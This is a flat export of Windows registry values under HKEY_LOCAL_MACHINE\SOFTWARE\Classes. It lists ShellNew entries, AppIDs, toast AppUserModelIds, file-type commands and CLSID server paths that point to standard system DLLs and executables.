HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp\ShellNew ItemName REG_EXPAND_SZ @%systemroot%\system32\mspaint.exe,-59414 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.library-ms\ShellNew IconPath REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-1001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\ShellNew IconPath REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-16769 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.symlink FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\shell32.dll,-4153 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.txt\ShellNew ItemName REG_EXPAND_SZ @%SystemRoot%\system32\notepad.exe,-470 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.zip\CompressedFolder\ShellNew ItemName REG_EXPAND_SZ @%SystemRoot%\system32\zipfldr.dll,-10194 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\accountpicturefile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-5203 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActivatableClasses\Package\Windows.PrintDialog_6.2.1.0_neutral_neutral_cw5n1h2txyewy\Server\Microsoft.Windows.PrintDialog ExePath REG_EXPAND_SZ %SystemRoot%\PrintDialog\PrintDialog.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\LaunchWorkfoldersControl MuiVerb REG_SZ @%SystemRoot%\system32\WorkfoldersControl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\shell\OfflineFilesLaunchSyncCenter MuiVerb REG_SZ @%SystemRoot%\system32\cscui.dll,-7006 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllProtocols\shell\openas MUIVerb REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-9016 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\anifile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\main.cpl,-2000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{06C792F8-6212-4F39-BF70-E8C0AC965C23} (Default) REG_EXPAND_SZ %systemroot%\System32\UserAccountControlSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{0da7bfdf-c0a0-44eb-be82-b7a82c4721de} (Default) REG_EXPAND_SZ %SystemRoot%\system32\appwiz.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1C749B87-568C-4865-8E73-6413F8372CE6} (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{514B5E31-5596-422F-BE58-D804464683B5} (Default) REG_EXPAND_SZ %systemroot%\system32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{6d2b5079-2f0b-48dd-ab7f-97cec514d30b} DllSurrogate REG_EXPAND_SZ %SystemRoot%\system32\prevhost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{7B130458-E09C-4823-A8AF-2583DCD9AEC7} DllSurrogate REG_EXPAND_SZ %SystemRoot%\System32\Eap3Host.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{87BB326B-E4A0-4DE1-94F0-B9F41D0C6059} DllSurrogate REG_EXPAND_SZ %SystemRoot%\System32\Eap3Host.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50} (Default) REG_EXPAND_SZ %SystemRoot%\System32\fveui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{D3E34B21-9D75-101A-8C3D-00AA001A1652} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-59419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8} (Default) REG_EXPAND_SZ %systemroot%\System32\UserAccountControlSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ApplicationContent FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-34649 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\explorer.exe TaskbarGroupIcon REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-4 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\isoburn.exe FriendlyAppName REG_SZ @%SystemRoot%\System32\isoburn.exe,-352 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\licensemanagershellext.exe\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\licensemanagershellext.exe,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\mspaint.exe\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\photoviewer.dll\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\provtool.exe\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.InputSwitchToastHandler DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\InputSwitchToastHandler.exe,-600 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@advancedkeysettingsnotification.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.LanguageComponentsInstaller DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\LanguageComponentsInstallerComHandler.exe,-600 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.ParentalControls DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\WpcRefreshTask.dll,-32000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.Defender.SecurityCenter DisplayName REG_EXPAND_SZ @%systemroot%\system32\SecurityHealthAgent.dll,-12001 IconUri REG_EXPAND_SZ %systemroot%\system32\WindowsSecurityIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.System.AppInitiatedDownload DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-1209 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.System.Continuum DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-12301 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.System.MiracastReceiver DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\MiracastReceiver.dll,-2050 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@WirelessDisplayToast.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.System.NearShareExperienceReceive DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\Microsoft-Windows-Internal-Shell-NearShareExperience.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.System.ShareExperience DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\windows.internal.shellcommon.shareexperience.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.AudioTroubleshooter DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\sndvolsso.dll,-2021 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@AudioToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.AutoPlay DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-9914 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.BackgroundAccess DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\modernexecserver.dll,-45058 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@BackgroundAccessToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.BdeUnlock DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\bdeunlock.exe,-150 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.BitLockerPolicyRefresh DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\edptask,-211 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@bitlockertoastimage.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Bthprops DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\bthprops.cpl,-2132 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.BthQuickPair DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\Microsoft.Bluetooth.UserService.dll,-109 IconUri REG_EXPAND_SZ %SystemRoot%\system32\BluetoothSystemToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Calling DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\TelephonyInteractiveUserRes.dll,-10006 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Compat DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\pcaui.dll,-103 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@AppHelpToast.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.DeviceConsent DisplayName REG_EXPAND_SZ %SystemRoot%\system32\consentux.dll,103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.DeviceEnrollmentActivity DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\Windows.Internal.Management.dll,-100 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@EnrollmentToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.DeviceManagement DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\DMAppsRes.dll,-26094 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Devices DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-9520 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.DisplaySettings DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\wpnuserservice.dll,-50 IconUri REG_EXPAND_SZ %SystemRoot%\ImmersiveControlPanel\images\logo.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.EnterpriseDataProtection DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\edptask,-201 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@edptoastimage.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Explorer DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22067 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.FodHelper DisplayName REG_EXPAND_SZ @%SystemRoot%\System32\fodhelper.exe,-100 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@optionalfeatures.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.HelloFace DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\facecredentialprovider.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.LocationManager DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\locationframework.dll,-203 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.LowDisk DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-51467 IconUri REG_EXPAND_SZ %SystemRoot%\ImmersiveControlPanel\images\logo.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.MobilityExperience DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ContentDeliveryManager.Utilities.dll,-36873 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.NfpAppAcquire DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ProximityUxHost.exe,-1010 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.NfpAppLaunch DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ProximityUxHost.exe,-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.NfpDevicePairing DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ProximityUxHost.exe,-2000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.NfpReceiveContent DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ProximityUxHost.exe,-1020 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Print.Notification DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\prnntfy.dll,-140 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.RasToastNotifier DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\RasApi32.dll,-1000 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@VpnToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.SecurityAndMaintenance DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\actioncentercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.SecurityCenter DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\actioncentercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.ServiceInitiatedHealing.Notification DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\sihclient.exe,-100 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@WindowsUpdateToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Share DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-2701 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.SoftLanding DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-12601 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Suggested DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\ContentDeliveryManager.Utilities.dll,-36872 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Usb.Notification DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\usbui.dll,-500 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.WiFiNetworkManager DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\wifinetworkmanager.dll,-4099 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.WindowsTip DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\twinui.dll,-12601 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.WindowsUpdate.Notification DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\musnotificationux.exe,-100 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@WindowsUpdateToastIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Winlogon DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\wlrmdr.exe,-1003 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.Wwansvc DisplayName REG_EXPAND_SZ @%SystemRoot%\system32\mbaeapi.dll,-500 IconUri REG_EXPAND_SZ %SystemRoot%\system32\@WwanNotificationIcon.png HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AutoProxyTypes\Application/x-internet-signup DllFile REG_EXPAND_SZ %SystemRoot%\system32\iedkcs32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AutoProxyTypes\Application/x-ns-proxy-autoconfig DllFile REG_EXPAND_SZ %SystemRoot%\system32\jsproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\acppage.dll,-6002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-68 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\brmFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\printbrmui.exe,-10 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\brmFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\printbrmui.exe,-104 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\cabview.dll,-20 InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\cabview.dll,-21 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\cabview.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\campfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\colorui.dll,-13 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\campfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\colorui.dll,-17 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\campfile\shell\Install Profile MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mscms.dll,-170 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CATFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cdmpfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\colorui.dll,-12 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cdmpfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\colorui.dll,-16 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cdmpfile\shell\Install Profile MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mscms.dll,-170 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CertificateStoreFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chkfile FriendlyTypeName REG_EXPAND_SZ @%systemroot%\system32\ulib.dll,-1000 InfoTip REG_EXPAND_SZ @%systemroot%\system32\ulib.dll,-1001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\hhctrl.ocx,-452 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\hh.exe,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\hh.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000301-A8F2-4877-BA0A-FD2B6645FB94}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000315-0000-0000-C000-000000000046}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\combase.dll,-5101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000316-0000-0000-C000-000000000046}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\combase.dll,-5101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000319-0000-0000-C000-000000000046}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\combase.dll,-5101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0002DF02-0000-0000-C000-000000000046}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\browser_broker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0010668C-0801-4DA6-A4A4-826522B6D28F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00108226-EE41-44A2-9E9C-4BE4D5B1D2CD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0010890e-8789-413c-adbc-48f5b511b3af}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{001DC1E0-0F8C-4720-98DB-39D32A661422}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{003e0278-eca8-4bb8-a256-3689ca1c2600}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{006E61DF-1A43-4F2C-B26F-780BAEA3A92D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hgcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0070746C-9A38-4236-822A-72CC4E5C8087}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00722F5F-CB8F-44D3-AC27-CC37F76CFE92}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{009F3B45-8A6B-4360-B997-B2A009A16402}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00A77FF7-A514-493e-B721-CDF8CB0F5B59}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\systemcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00B8308C-09F2-4c18-A7B0-4594D6B22EFE}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2763-6A77-11D0-A535-00C04FD7D062}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2764-6A77-11D0-A535-00C04FD7D062}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00CA399E-4CC0-43D2-902B-CEA3D36DC9E4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\remoteaudioendpoint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00da2f99-f2a6-40c2-b770-a920f8e44abc}\MergedFolder DefaultOverlayIcon REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-169 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00eebf57-477d-4084-9921-7ab3c2c9459d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f2b433-44e4-4d88-b2b0-2698a0a91dba}\LocalServer32 (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll",AutoplayComServerW {00f2b433-44e4-4d88-b2b0-2698a0a91dba} ServerExecutable REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0102563D-F16D-434d-82A2-37968BD3E31E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\WLanHC.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{011BE22D-E453-11D1-945A-00C04FB984F9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0131BE10-2001-4C5F-A9B0-CC88FAB64CE8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01458CF0-A1A2-11D1-8F85-00600895E7D5}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtctm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\MsCtfMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{016fd94e-b02a-4ab8-94c6-149fdab56b8d}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\comuid.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01776DF3-B9AF-4E50-9B1C-56E93116D704} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\EditionUpgradeHelper.dll,-3100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01776DF3-B9AF-4E50-9B1C-56E93116D704}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\EditionUpgradeHelper.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{017F10E3-89E4-49F0-B545-618DE31FD27C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{018BA427-F311-44FD-8AA1-ABEEB57739D9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01A30791-40AE-4653-AB2E-FD210019AE88}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mgmtrefreshcredprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01A3BF5C-CC93-4C12-A4C3-09B0BBE7F63F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasnap.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\actioncenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01B90D9A-8209-47F7-9C52-E1244BF50CED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01C6CA30-792B-404B-A5C2-0A34434B3AA4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01D0A625-782D-4777-8D4E-547E6457FAD5} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\werconcpl.dll,-351 